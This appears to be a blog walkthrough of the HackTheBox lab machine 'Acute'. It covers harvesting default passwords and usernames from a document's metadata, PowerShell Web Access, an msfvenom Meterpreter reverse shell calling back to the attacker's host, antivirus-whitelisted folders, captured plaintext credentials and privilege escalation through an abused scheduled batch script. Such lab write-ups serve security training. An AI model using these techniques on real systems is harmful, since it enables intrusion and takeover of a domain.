Posted onEdited onInHackTheBox walkthroughViews: Word count in article: 4.1kReading time ≈15 mins.
introduce
OS: Windows Difficulty: Hard Points: 40 Release: 12 Feb 2022 IP: 10.10.11.145
Enumeration
NMAP
1 2 3 4 5
┌──(root💀kali)-[~/hackthebox/machine/acute] └─# nmap -sV -v -p- --min-rate=10000 10.10.11.145 PORT STATE SERVICE VERSION 443/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
We have only one TCP port and it gives us hostname. Let’s add it to our hosts file and access the web.
It looks like a healthcare website. Under ‘About Us’ you will get employee/user names as well as from right top corner you will get a document file ‘New Starter Forms’.
Download the document. It is a induction checklist for new employees.
From this document we will get couple crucial things.
1 2 3
IT overview
Arrange for the new starter to receive a demonstration on using IT tools which may include MUSE, myJob and Google accounts. Walk the new starter through the password change policy, they will need to change it from the default Password1!. Not all staff are changing these so please be sure to run through this.
The default password is Password1! and some staff members are still using the same password for their account. We have a PSWA (PowerShell WebAccess) session/configuration name dc_manage
1 2 3 4 5 6 7 8 9
Initial Probation Meeting (For Academic staff on Probation only)
Arrange initial probation meeting between Probationer, Head of Department and Probation Adviser.
Run through the new PSWA to highlight the restrictions set on the sessions named dc_manage.
The probation plan should be completed within a month of the start date and should include a requirement to register with LETs re: rate to gain within 3 months of starting. Fellowship of the Higher Education Academy (FHEA).
We also have link to PSWA https://atsserver.acute.local/Acute_Staff_Access
1 2 3 4 5
Induction meetings with management staff
Arrange for the new starter to meet with other staff in the department as appropriate. This could include the Head of Department and/or other members of the appointee’s team. Complete the https://atsserver.acute.local/Acute_Staff_Access training
Induction Coordinator
Now we can access the remote powershell via browser. Lastly, Lois user has highest privileges and she can change group membership of any user for group called site admin
1
**Lois is the only authorized personnel to change Group Membership, Contact Lois to have this approved and changed if required. Only Lois can become site admin. **
Now we have couple things in loot box, let’s access PSWA.
Se need username, password and computer name. So far we have employee names from website, we have default password. But we don’t have computer name.
If we run exiftool on this downloaded docx file, we will get remaining information.
┌──(root💀kali)-[~/hackthebox/machine/acute] └─# exiftool New_Starter_CheckList_v7.docx ExifTool Version Number : 12.39 File Name : New_Starter_CheckList_v7.docx Directory : . File Size : 34 KiB File Modification Date/Time : 2022:02:16 10:07:39-05:00 File Access Date/Time : 2022:02:16 10:09:02-05:00 File Inode Change Date/Time : 2022:02:16 10:08:07-05:00 File Permissions : -rw-r--r-- File Type : DOCX File Type Extension : docx MIME Type : application/vnd.openxmlformats-officedocument.wordprocessingml.document Zip Required Version : 20 Zip Bit Flag : 0x0006 Zip Compression : Deflated Zip Modify Date : 1980:01:01 00:00:00 Zip CRC : 0x079b7eb2 Zip Compressed Size : 428 Zip Uncompressed Size : 2527 Zip File Name : [Content_Types].xml Creator : FCastle Description : Created on Acute-PC01 Last Modified By : Daniel Revision Number : 8 Last Printed : 2021:01:04 15:54:00Z Create Date : 2021:12:08 14:21:00Z Modify Date : 2021:12:22 00:39:00Z Template : Normal.dotm Total Edit Time : 2.6 hours Pages : 3 Words : 886 Characters : 5055 Application : Microsoft Office Word Doc Security : None Lines : 42 Paragraphs : 11 Scale Crop : No Heading Pairs : Title, 1 Titles Of Parts : Company : University of Marvel Links Up To Date : No Characters With Spaces : 5930 Shared Doc : No Hyperlinks Changed : No App Version : 16.0000
From this metadata we got two things, computer name that is Acute-Pc01 from description and username format FCastle from Creator. Let’s login
As you can see, the IP address is different from machine IP. It looks like a container or virtual machine (hyper-v). We can ping the gateway IP address.
We can check foe open port on the gateway IP address.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
PS C:\Users\edavies\Documents>
Test-NetConnection 172.16.22.1 -port 445
ComputerName : 172.16.22.1
RemoteAddress : 172.16.22.1
RemotePort : 445
InterfaceAlias :
SourceAddress :
TcpTestSucceeded : True
As you can see, port 445 is open. We can run powershell script to get to know open ports on gateway IP address.
IEX will download and execute the script. If you try to download it and execute manually using curl or method then it will not work. Now run below command to start finding open ports on that IP address.
After couple minutes we can check the open ports dumped into that file.
1
Get-Content .\ports_open_gateway
Looks like this IP is Domain Controller, as it is running Kerberos and LDAP. Let’s get a real shell by uploading our reverse shell executable. If we try to run executable from either home directory or programdata, it gives us error message.
1 2 3 4 5 6 7 8
┌──(root💀kali)-[~/hackthebox/machine/acute] └─# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.30 LPORT=9001 -f exe -o reverse.exe [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder specified, outputting raw payload Payload size: 510 bytes Final size of exe file: 7168 bytes Saved as: reverse.exe
Antivirus is running, probably defender. So, we can query the registry to find whitelisted paths.
As you can see, there are two folders which are whitelisted. We can use ‘utils’ directory to execute our payloads. Let’s download our executable there and run it.
[*] Started reverse TCP handler on 10.10.14.30:9001 [*] Sending stage (200262 bytes) to 10.10.11.145 [*] Meterpreter session 1 opened (10.10.14.30:9001 -> 10.10.11.145:49778 ) at 2022-02-16 12:14:39 -0500
meterpreter > getuid Server username: ACUTE\edavies
Alright, we have working shell now. Let’s switch to powershell and enumerate.
1 2 3 4
PS C:\utils> net user edavies /domain The request will be processed at a domain controller for domain acute.local. System error 1722 has occurred. The RPC server is unavailable.
If we try to query the domain, we’d get this above error. So, we can’t query domain for anything. Let’s run ‘WinPeas’ application and find LPE paths.
1 2 3 4
RDP Sessions SessID pSessionName pUserName pDomainName State SourceIP 1 Console edavies ACUTE Active
WinPeas gives us this information. RDP session is running on the machine and logged in as ‘Edavies’ user. If it is RDP then its GUI not cmd line. We have to see what’s happening on the box.
We have access ‘edavies’ user. Now we can check what’s happening on that RDP.
It started streaming the GUI. We need to access it via browser by visiting that player path.
After waiting for couple minutes, a powershell window pops up and starts running powershell commands.
1
screenshare -q 100 -d 5000
As you can see based on executing commands, it is trying to start a new powershell session with an user (imonks) password and it is also using a configuration to access the session.
The above command is being executed. We could have used that password to login via RDP, but RDP is not enabled on main host (not hyper-v). We have to use this technique only.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
PS C:\utils> $pass = ConvertTo-SecureString "W3_4R3_th3_f0rce." -AsPlaintext -Force PS C:\utils> $cred = New-Object System.Management.Automation.PSCredential ("acute\imonks", $pass) PS C:\utils> Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage - credential $cred Enter-PSSession : The term 'Measure-Object' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again. At line:1 char:1 + Enter-PSSession -computername ATSSERVER -ConfigurationName dc_manage ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (Measure-Object:String) [Enter- PSSession], CommandNotFoundException + FullyQualifiedErrorId : CommandNotFoundException
As you can see it is giving us the same error as RDP screenshot. It’s not able to find ‘Measure-Object’ cmdlet is not recognized by the powershell.
It is available to ‘Edavie’ user but not to ‘imonks’ user. However, the credentials are not wrong. We can try to invoke-command to execute windows commands.
User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 21/12/2021 14:51:31 Password expires Never Password changeable 22/12/2021 14:51:31 Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 16/02/2022 17:47:45 Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *Managers The command completed successfully.
‘imonks’ user is member of ‘Manger’ group. Let’s find who else is member of manager group.
User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 21/12/2021 14:50:36 Password expires Never Password changeable 22/12/2021 14:50:36 Password required Yes User may change password No Workstations allowed All Logon script User profile Home directory Last logon 23/12/2021 09:15:29 Logon hours allowed All Local Group Memberships Global Group memberships *Domain Users *Managers The command completed successfully.
User ‘awallace’ is member of manager group. To enumerate AD we need imonks shell access. We can’t execute any useful commands which can help to us to run our executable files.
If we execute this script, then it sets a secure password, and execute ‘Get-Volume’ from ‘jmorgan’ users context. We have to edit it script and modify the invoke command.
This command will replace the Get-Volume string with cmd.exe /c c:\utils\msf.exe We already have reverse.exe in utils directory. So upon execution we get the reverse connection on metasploit. Let’s read the contents of file to make sure our cmd is good to go.
Group Name Type SID Attributes ========================================== ================ ============ =============================================================== Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group Mandatory Label\High Mandatory Level Label S-1-16-12288
‘jmorgan’ is member of Administrator. We can just elevate our privs to system.
1 2 3 4
meterpreter > getsystem ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM
We may have pwned the admin, but it is not the actual host, but Hyper-V. You can confirm by running ipconfig.
Started: Thu Feb 17 02:09:11 2022 Stopped: Thu Feb 17 02:09:32 2022
We got the password. For a hard machine this password is quite weak. I tried to use this password to get hold of ATSSERVER (host), but can’t able to do that. However, we still have access ‘edavies’ shell. We can try to run commands from a different users perspective. Previously we queried the domain to find member of manager group, there was one user awallace , let’s try to use this password from this users context.
Make sure you are running the next command from ‘edavies’ user shell.
It worked, now we can run commands from awallace user’s context. There’s nothing much available on user directory, however, previously we checked some weird directory in C drive, let’s see if we can access that with this users permission.
REM This is run every 5 minutes. For Lois use ONLY
@echo off
for /R %%x in (*.bat) do (
if not "%%x" == "%~0" call "%%x"
)
This looks like a schedule script, it runs this batch file every five minutes and checks for any .bat files in the parent directory and if there’s a .bat file then it executes it. The main thing/information is that the script is for only lois user and we already know that, lois is the only user who can change group membership. This is from DOCX file.
So, we can create a batch file which gives ‘awallace’ user administrator privileges of ‘site admin’ group.
